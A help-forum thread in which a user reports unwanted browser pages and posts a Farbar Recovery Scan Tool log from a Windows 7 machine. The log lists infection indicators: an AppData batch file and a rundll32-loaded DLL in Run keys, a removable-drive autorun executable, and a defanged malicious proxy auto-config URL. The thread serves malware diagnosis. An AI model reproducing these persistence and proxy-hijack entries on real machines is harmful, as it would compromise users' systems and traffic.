
Unwanted pages opening in the browser

veny
Visitor
Posts: 25
Registered: 27 Aug 2006 21:27

#1 Post by veny »

Hello,
AdwCleaner was run twice, so two logs are attached.
Plus the FRST log.
Please do a preventive check of the logs, because it looks like everything is fine for now after the cleanup with AdwCleaner.
Attachments
AdwCleaner.zip
(3.27 KiB) Downloaded 94 times
Last edited by veny on 03 Nov 2017 12:48, edited 1 time in total.

Re: Unwanted windows opening in the browser

#2 Post by veny »

FRST log
Attachments
FRST.zip
(11.79 KiB) Downloaded 82 times

#3 Post by veny »

FRST Addition log

The attachments could not be added to a single post.

Thank you, V.
Attachments
Addition.zip
(16.62 KiB) Downloaded 82 times

#4 Post by veny »

Since the problem still persists, I am attaching a new FRST log.
Thank you

Code:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 26-10-2017
Ran by CAM (administrator) on CAM-PC (01-11-2017 07:36:11)
Running from C:\Users\CAM\Desktop
Loaded Profiles: CAM & ReportServer$HORRY & MSSQLFDLauncher$HORRY & MSSQL$HORRY & ReportServer & MSSQLFDLauncher & MSSQLSERVER (Available Profiles: CAM & postgres & vaclav & ReportServer$HORRY & MSSQLFDLauncher$HORRY & MSSQL$HORRY & ReportServer & MSSQLFDLauncher & MSSQLSERVER & Classic .NET AppPool & DefaultAppPool)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: Čeština (Česká republika)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Windows\System32\nvwmi64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvwmi64.exe
(Microsoft Corporation) C:\Windows\System32\inetsrv\inetinfo.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.HELIOS\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL12.HORRY\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSRS12.MSSQLSERVER\Reporting Services\ReportServer\bin\ReportingServicesService.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSRS12.HORRY\Reporting Services\ReportServer\bin\ReportingServicesService.exe
(SafeNet, Inc.) C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe
(SafeNet, Inc) C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe
(SafeNet, Inc.) C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Security Runtime\sntlsrtsrvr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\fdhost.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL12.HORRY\MSSQL\Binn\fdlauncher.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL12.HORRY\MSSQL\Binn\fdhost.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Disc Soft Ltd) C:\Program Files (x86)\DAEMON Tools Lite\DiscSoftBusServiceLite.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(forum.viry.cz) C:\Users\CAM\Desktop\FRSTLauncher.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [MSC] => C:\Program Files\Microsoft Security Client\msseces.exe [1353680 2016-11-14] (Microsoft Corporation)
HKLM-x32\...\Run: [ISUSScheduler] => C:\Program Files (x86)\Common Files\InstallShield\UpdateService\issch.exe [81920 2005-02-17] (InstallShield Software Corporation)
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\Run: [ISUSPM Startup] => c:\Program Files (x86)\Common Files\InstallShield\UpdateService\ISUSPM.exe [221184 2005-02-17] (InstallShield Software Corporation)
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files (x86)\DAEMON Tools Lite\DTAgent.exe [4701888 2017-02-07] (Disc Soft Ltd)
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\Run: [*yyixt<*>] => "C:\Users\CAM\AppData\Local\a5d330da\91eaeea4.bat" <==== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\Run: [Documents index service] => C:\Windows\system32\rundll32.exe "C:\Users\Public\Documents\DocumentsIndex.dll",Run
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\Policies\Explorer: [] 
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\...\MountPoints2: {658228cd-f130-11e3-b477-806e6f6e6963} - E:\ppk.exe
HKU\S-1-5-80-2885764129-887777008-271615777-1616004480-2722851051\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516096 2010-11-21] (Microsoft Corporation)
HKU\S-1-5-80-3263513310-3392720605-1798839546-683002060-3227631582\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516096 2010-11-21] (Microsoft Corporation)
HKU\S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516096 2010-11-21] (Microsoft Corporation)
GroupPolicy: Restriction <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

AutoConfigURL: [S-1-5-21-834650113-1102577966-3259890034-1000] => hxxp://web-quick-access.com/wpad.dat?b4dfed9846cc3cf5ff885fa5efcbf18f36423907
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.130.1
Tcpip\..\Interfaces\{4398B7F7-ED98-4D06-9E1D-977DF65502DC}: [DhcpNameServer] 192.168.130.1
ManualProxies: 0hxxp://web-quick-access.com/wpad.dat?b4dfed9846cc3cf5ff885fa5efcbf18f36423907

Internet Explorer:
==================
HKU\S-1-5-21-834650113-1102577966-3259890034-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.cz/
SearchScopes: HKU\S-1-5-21-834650113-1102577966-3259890034-1000 -> DefaultScope {30E41A7F-5CC8-474D-86D8-8021572B7DF3} URL = hxxps://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-834650113-1102577966-3259890034-1000 -> {30E41A7F-5CC8-474D-86D8-8021572B7DF3} URL = hxxps://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-834650113-1102577966-3259890034-1000 -> {BF349553-1CF0-4DDC-B940-AACA54DF1D91} URL = hxxp://tv.seznam.cz/hledej?w={searchTerms}&sourceid=QuickSearch_12454
BHO: GBHO.BHO -> {45d30484-7ded-43d9-957a-d2fd1f046511} -> C:\Windows\system32\mscoree.dll [2010-11-21] (Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_121\bin\ssv.dll [2017-02-03] (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2017-03-29] (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office16\URLREDIR.DLL [2015-07-31] (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-02-03] (Oracle Corporation)
BHO-x32: Pomocná služba pro přihlášení k účtu Microsoft -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2017-03-29] (Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office16\URLREDIR.DLL [2015-07-31] (Microsoft Corporation)
BHO-x32: Microsoft Web Test Recorder 14.0 Helper -> {b924f0b4-0b3c-49c0-bab2-213fb9ebd1d3} -> C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.QualityTools.RecorderBarBHO100.dll [2015-07-06] (Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2017-07-11] (Microsoft Corporation)
Toolbar: HKLM - Smart Recovery 2 - {1d09c093-f71e-43c3-b948-19316cbd695e} - C:\Windows\system32\mscoree.dll [2010-11-21] (Microsoft Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2017-03-29] (Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2017-03-29] (Google Inc.)
DPF: HKLM-x32 {A8F2B9BD-A6A0-486A-9744-18920D898429} hxxp://www.sibelius.com/download/software/win/ActiveXPlugin.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} -  No File
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} -  No File
Handler: mso-minsb-roaming.16 - No CLSID Value
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2017-08-15] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2017-08-15] (Microsoft Corporation)
Handler: osf-roaming.16 - No CLSID Value
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2017-08-15] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2017-08-15] (Microsoft Corporation)

FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll [2015-08-13] ()
FF Plugin: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-02-03] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-02-03] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~4\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll [2015-08-13] ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~4\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-02-06] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-02-06] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-02] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-07-31] (Adobe Systems Inc.)

Chrome: 
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default [2017-10-31]
CHR Extension: (Prezentace Google) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-04-28]
CHR Extension: (Dokumenty Google) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-04-28]
CHR Extension: (Disk Google) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-04-28]
CHR Extension: (YouTube) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-04-28]
CHR Extension: (Vyhledávání Google) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2017-02-16]
CHR Extension: (Tabulky Google) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-04-28]
CHR Extension: (Dokumenty Google offline) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-04-28]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-04-28]
CHR Extension: (电脑管家上网防护) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\ooebklgpfnbcnpokahmdidgbmlcdepkm [2017-02-16]
CHR Extension: (Gmail) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-04-28]
CHR Extension: (Chrome Media Router) - C:\Users\CAM\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-09-19]

Opera: 
=======
OPR Extension: (Translator) - C:\Users\CAM\AppData\Roaming\Opera Software\Opera Stable\Extensions\cnbpedcoekjafichoehopgaaldogogch [2017-06-07]
OPR Extension: (Pinky) - C:\Users\CAM\AppData\Roaming\Opera Software\Opera Stable\Extensions\ibgecmlomhdooncfjlaelfbbeijbccbd [2017-10-10]
OPR Extension: (Adblock Plus) - C:\Users\CAM\AppData\Roaming\Opera Software\Opera Stable\Extensions\oidhhegpmlfpoeialbgcdocjalghfpkp [2017-09-29]
StartMenuInternet: (HKLM) OperaStable - C:\Program Files (x86)\TC UP\PLUGINS\Media\Opera\launcher.exe

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2227312 2017-01-19] (Adobe Systems, Incorporated)
S3 AppleChargerSrv; C:\Windows\System32\AppleChargerSrv.exe [31272 2010-04-06] ()
R3 Disc Soft Lite Bus Service; C:\Program Files (x86)\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1471168 2017-02-07] (Disc Soft Ltd)
S3 FabricHostSvc; C:\Program Files\Microsoft Service Fabric\bin\FabricHost.exe [3495072 2017-01-13] (Microsoft)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-03] (Macrovision Corporation) [File not signed]
R2 IISADMIN; C:\Windows\system32\inetsrv\inetinfo.exe [15872 2010-11-21] (Microsoft Corporation)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
S2 MSSQL$ECSQLEXPRESS; c:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.ECSQLEXPRESS\MSSQL\Binn\sqlservr.exe [43130032 2015-03-29] (Microsoft Corporation)
R2 MSSQL$HELIOS; c:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.HELIOS\MSSQL\Binn\sqlservr.exe [61913952 2010-04-03] (Microsoft Corporation)
R2 MSSQL$HORRY; C:\Program Files\Microsoft SQL Server\MSSQL12.HORRY\MSSQL\Binn\sqlservr.exe [372416 2017-07-03] (Microsoft Corporation)
R2 MSSQL$SQLEXPRESS; C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\Binn\sqlservr.exe [372416 2017-07-03] (Microsoft Corporation)
R3 MSSQLFDLauncher; C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe [50880 2014-02-21] (Microsoft Corporation)
R3 MSSQLFDLauncher$HORRY; C:\Program Files\Microsoft SQL Server\MSSQL12.HORRY\MSSQL\Binn\fdlauncher.exe [50880 2014-02-21] (Microsoft Corporation)
R2 MSSQLSERVER; C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\sqlservr.exe [372416 2017-07-03] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [459832 2017-02-06] (NVIDIA Corporation)
R2 NVWMI; C:\Windows\system32\nvwmi64.exe [4167224 2017-02-07] (NVIDIA Corporation)
R2 ReportServer; C:\Program Files\Microsoft SQL Server\MSRS12.MSSQLSERVER\Reporting Services\ReportServer\bin\ReportingServicesService.exe [2536640 2016-06-18] (Microsoft Corporation)
R2 ReportServer$HORRY; C:\Program Files\Microsoft SQL Server\MSRS12.HORRY\Reporting Services\ReportServer\bin\ReportingServicesService.exe [2536640 2016-06-18] (Microsoft Corporation)
R2 SentinelKeysServer; C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe [403744 2015-06-05] (SafeNet, Inc.)
R2 SentinelProtectionServer; C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe [1259808 2015-06-03] (SafeNet, Inc)
R2 SentinelSecurityRuntime; C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Security Runtime\sntlsrtsrvr.exe [293216 2013-01-09] (SafeNet, Inc.)
S4 Siemens PLM License Server; C:\Program Files\Siemens\PLMLicenseServer\lmgrd.exe [1830736 2014-01-06] (Flexera Software LLC.)
S4 Smart TimeLock; C:\Program Files (x86)\GIGABYTE\Smart6\Timelock\TimeMgmtDaemon.exe [114688 2009-10-13] (Gigabyte Technology CO., LTD.) [File not signed]
S4 SQLAgent$ECSQLEXPRESS; c:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.ECSQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [381104 2015-03-29] (Microsoft Corporation)
S4 SQLAgent$HELIOS; c:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.HELIOS\MSSQL\Binn\SQLAGENT.EXE [428384 2010-04-03] (Microsoft Corporation)
S4 SQLAgent$HORRY; C:\Program Files\Microsoft SQL Server\MSSQL12.HORRY\MSSQL\Binn\SQLAGENT.EXE [613056 2017-07-03] (Microsoft Corporation)
S4 SQLSERVERAGENT; C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\SQLAGENT.EXE [613056 2017-07-03] (Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10803440 2017-08-29] (TeamViewer GmbH)
S3 VSStandardCollectorService140; C:\Program Files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [108776 2016-09-06] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2016-08-16] (Microsoft Corporation)
S3 WMSVC; C:\Windows\system32\inetsrv\wmsvc.exe [10752 2009-07-14] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 AppleCharger; C:\Windows\System32\DRIVERS\AppleCharger.sys [21104 2011-01-10] ()
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2017-06-26] (Disc Soft Ltd)
S3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2017-06-26] (Disc Soft Ltd)
S3 GVTDrv64; C:\Windows\GVTDrv64.sys [30528 2014-07-02] ()
R2 KtlLogger; C:\Program Files\Microsoft Service Fabric\bin\Fabric\Fabric.Code\KtlLogger.sys [975848 2017-01-13] (Microsoft Corporation)
R2 LeasLayr; C:\Program Files\Microsoft Service Fabric\bin\Fabric\Fabric.Code\LeasLayr.sys [567784 2017-01-13] (Microsoft Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
R1 MpKsl1b40fe5b; C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{FB9A9B90-C6EA-4BB6-B54E-58557D6E1B63}\MpKsl1b40fe5b.sys [49392 2017-10-31] (Microsoft Corporation)
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S4 RsFx0320; C:\Windows\System32\DRIVERS\RsFx0320.sys [250048 2016-06-18] (Microsoft Corporation)
S3 RTTEAMPT; C:\Windows\System32\DRIVERS\RtTeam620.sys [58512 2012-07-03] (Realtek Corporation)
R2 Sentinel64; C:\Windows\System32\Drivers\Sentinel64.sys [145448 2009-09-17] (SafeNet, Inc.)
R3 SNTUSB64; C:\Windows\System32\DRIVERS\SNTUSB64.SYS [63568 2012-12-11] (SafeNet, Inc.)
R1 VD_FileDisk; C:\Windows\System32\Drivers\VD_FileDisk.sys [30312 2011-01-26] (CaptainFlint Software)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-11-01 06:40 - 2017-11-01 06:40 - 000012077 _____ C:\Users\CAM\Desktop\FRST.zip
2017-11-01 06:37 - 2017-11-01 06:37 - 000017017 _____ C:\Users\CAM\Desktop\Addition.zip
2017-10-31 13:52 - 2017-11-01 07:36 - 000021845 _____ C:\Users\CAM\Desktop\FRST.txt
2017-10-31 13:52 - 2017-10-31 13:52 - 000000000 ____D C:\FRST
2017-10-31 13:42 - 2017-11-01 06:50 - 000000000 ____D C:\AdwCleaner
2017-10-31 13:40 - 2017-10-31 13:41 - 008261584 _____ (Malwarebytes) C:\Users\CAM\Desktop\adwcleaner_7.0.4.0.exe
2017-10-31 13:38 - 2017-10-31 13:38 - 000112640 _____ (forum.viry.cz) C:\Users\CAM\Desktop\FRSTLauncher.exe
2017-10-31 13:37 - 2017-10-31 13:37 - 002403328 _____ (Farbar) C:\Users\CAM\Desktop\FRST64.exe
2017-10-31 08:40 - 2017-10-31 09:53 - 000000000 ____D C:\Program Files (x86)\MagicBerry for Blackberry
2017-10-31 08:40 - 2010-02-16 15:22 - 000155984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comdlg32.ocx
2017-10-31 08:40 - 2004-03-09 00:00 - 001081616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscomctl.ocx
2017-10-23 05:13 - 2017-10-23 05:14 - 000000000 ___HD C:\$WINDOWS.~BT
2017-10-20 09:15 - 2017-10-21 00:12 - 000000000 ____D C:\ESD
2017-10-20 09:12 - 2017-10-20 09:12 - 000000000 ___HD C:\$Windows.~WS
2017-10-10 20:23 - 2017-09-13 16:33 - 000631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2017-10-10 20:23 - 2017-09-13 16:32 - 005547752 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-10-10 20:23 - 2017-09-13 16:32 - 000706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2017-10-10 20:23 - 2017-09-13 16:32 - 000154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2017-10-10 20:23 - 2017-09-13 16:32 - 000095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2017-10-10 20:23 - 2017-09-13 16:31 - 001732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 001212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 001068544 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000886272 _____ (Microsoft Corporation) C:\Windows\system32\wlansvc.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000448512 _____ (Microsoft Corporation) C:\Windows\system32\wlansec.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000414208 _____ (Microsoft Corporation) C:\Windows\system32\wlanmsm.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000118784 _____ (Microsoft Corporation) C:\Windows\system32\wlanhlp.dll
2017-10-10 20:23 - 2017-09-13 16:28 - 000113664 _____ (Microsoft Corporation) C:\Windows\system32\wlanapi.dll
